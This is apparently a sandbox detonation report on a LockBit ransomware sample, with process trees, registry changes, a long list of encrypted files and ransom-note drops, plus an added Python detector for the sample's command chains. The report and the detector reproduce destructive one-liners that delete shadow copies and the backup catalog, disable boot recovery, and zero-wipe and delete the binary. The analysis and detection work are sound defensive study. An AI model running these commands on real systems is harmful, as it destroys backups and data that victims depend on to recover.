PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"
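
Added detection logic (not part of the sandbox report) for the two cmd.exe chains in the process list above: the recovery-inhibition one-liner (vssadmin, wmic shadowcopy, bcdedit, wbadmin; ATT&CK T1490) and the self-deletion chain, where ping is only a delay so the parent can exit, fsutil setZeroData overwrites the first 512 KB of the binary, and del removes the now-unrecoverable file (T1070.004). The command lines and PIDs are the report's own; the ProcessEvent schema and the sample's parent PID (1000) are assumptions.

```python
"""Detect recovery inhibition and self-deletion in chained cmd.exe command lines.
Added example; command lines and PIDs come from the sandbox report, the event
schema and the sample's ppid are assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable (assumed field, as in Sysmon EID 1)
    cmdline: str   # command line as logged


# One pattern per recovery-inhibiting command (ATT&CK T1490).  Each is tested against a
# single segment of the chained command line, so "wmic shadowcopy delete" is found even
# when it sits in the middle of a long "cmd /c a & b & c" one-liner.
RECOVERY_INHIBIT_PATTERNS = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "bcdedit_bootstatuspolicy_ignore": re.compile(
        r"\bbcdedit(?:\.exe)?\s+/set\s+\S+\s+bootstatuspolicy\s+ignoreallfailures\b", re.I),
    "bcdedit_recoveryenabled_no": re.compile(
        r"\bbcdedit(?:\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no\b", re.I),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I),
}
# '&&' must precede '&' and '||' precede '|'.  Quoting is ignored: a quoted path that
# itself contains '&' would be split, which is acceptable for a detection heuristic.
SEGMENT_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
CMD_PREFIX = re.compile(r'^\s*"?[^"]*cmd(?:\.exe)?"?\s+/[cCkK]\s+')


def split_segments(cmdline: str) -> list[str]:
    """Drop a leading 'cmd.exe /c' and split the rest on the chaining operators."""
    body = CMD_PREFIX.sub("", cmdline, count=1)
    return [seg for seg in SEGMENT_SPLIT.split(body) if seg]


def recovery_inhibition_hits(cmdline: str) -> set[str]:
    """Names of the recovery-inhibiting commands present anywhere in the chain."""
    return {name for seg in split_segments(cmdline)
            for name, pat in RECOVERY_INHIBIT_PATTERNS.items() if pat.search(seg)}


def find_recovery_inhibition(events, min_hits: int = 2) -> list[tuple[int, set[str]]]:
    """(pid, hits) for each process whose command line chains >= min_hits such commands.
    min_hits=1 also reports every child (vssadmin.exe, bcdedit.exe ...) on its own."""
    out = []
    for ev in events:
        hits = recovery_inhibition_hits(ev.cmdline)
        if len(hits) >= min_hits:
            out.append((ev.pid, hits))
    return out


def _quoted(segment: str) -> set[str]:
    return {p.lower() for p in re.findall(r'"([^"]+)"', segment)}


def find_self_delete(events) -> list[tuple[int, int, str]]:
    """(cmd_pid, parent_pid, parent_image) for a cmd.exe child whose chain deletes its
    parent's own image after a ping/timeout delay or a fsutil setZeroData wipe."""
    by_pid = {ev.pid: ev for ev in events}
    out = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or "\\cmd.exe" not in ev.image.lower():
            continue
        segs = split_segments(ev.cmdline)
        delayed = any(re.match(r"(?:ping|timeout)\b", s, re.I) for s in segs)
        wiped = set().union(*(_quoted(s) for s in segs
                              if re.match(r"fsutil\s+file\s+setzerodata\b", s, re.I)))
        deleted = set().union(*(_quoted(s) for s in segs if re.match(r"(?:del|erase)\b", s, re.I)))
        target = parent.image.lower()
        if target in deleted and (delayed or target in wiped):
            out.append((ev.pid, parent.pid, parent.image))
    return out


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"
# Process tree from the report's Processes section; the sample's own ppid (1000) is assumed.
REPORT_EVENTS = [
    ProcessEvent(2856, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcessEvent(2956, 2856, r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete'
                 r' & bcdedit /set {default} bootstatuspolicy ignoreallfailures'
                 r' & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'),
    ProcessEvent(1988, 2956, r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcessEvent(1412, 2956, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
    ProcessEvent(2424, 2956, r"C:\Windows\system32\bcdedit.exe",
                 "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcessEvent(2876, 2956, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcessEvent(1888, 2956, r"C:\Windows\system32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    # WoW64: the 32-bit sample's "System32\cmd.exe" resolves to SysWOW64, exactly as the report shows.
    ProcessEvent(776, 2856, r"C:\Windows\SysWOW64\cmd.exe",
                 rf'"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul'
                 rf' & fsutil file setZeroData offset=0 length=524288 "{SAMPLE}" & Del /f /q "{SAMPLE}"'),
    ProcessEvent(2840, 776, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.7 -n 3"),
    ProcessEvent(476, 776, r"C:\Windows\SysWOW64\fsutil.exe",
                 rf'fsutil file setZeroData offset=0 length=524288 "{SAMPLE}"'),
]

if __name__ == "__main__":
    print(find_recovery_inhibition(REPORT_EVENTS))
    print(find_self_delete(REPORT_EVENTS))
```

Matching on the parent's image path rather than on "fsutil" alone is what separates this from routine administrative use of fsutil; the ping-to-loopback delay is a well-worn idiom, so the delay alone is treated as supporting evidence, not as the trigger.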

Network

Country Destination Domain Proto

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5 18f0a8ba3fee94cc312f972e3dd92516
SHA1 16994dd14059bfd6a890ac0c6a3a0b67aa33ce45
SHA256 27a63df2e83b00c8a9d40dbe648ad4d8a47f26a8ea4270356ff83f5247b9141f
SHA512 854a9c31ef5cad85435100221455b8f712f78b80cb41c2e84d332ab84824aa6bc6df92464ef433f773b24c563143c248bbe69c7f568c9fe7e3836929ee281ca6

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-29 08:02

Reported

2024-02-29 08:05

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (14166) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\file.None.0xfffffa801c116990.mal.exe\"" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1FF7.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\uk-UA\setup_wm.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\giflib.md.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\office32ww.msi.16.x-none.vreg.dat.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TAG.XSL.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_f_col.hxk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmpnssci.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\card_terms_dict.txt.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.tree.dat.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages.properties.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaSansDemiBold.ttf.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\ARROW.WAV.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xalan.md.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-80.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALN.TTF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnscfg.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
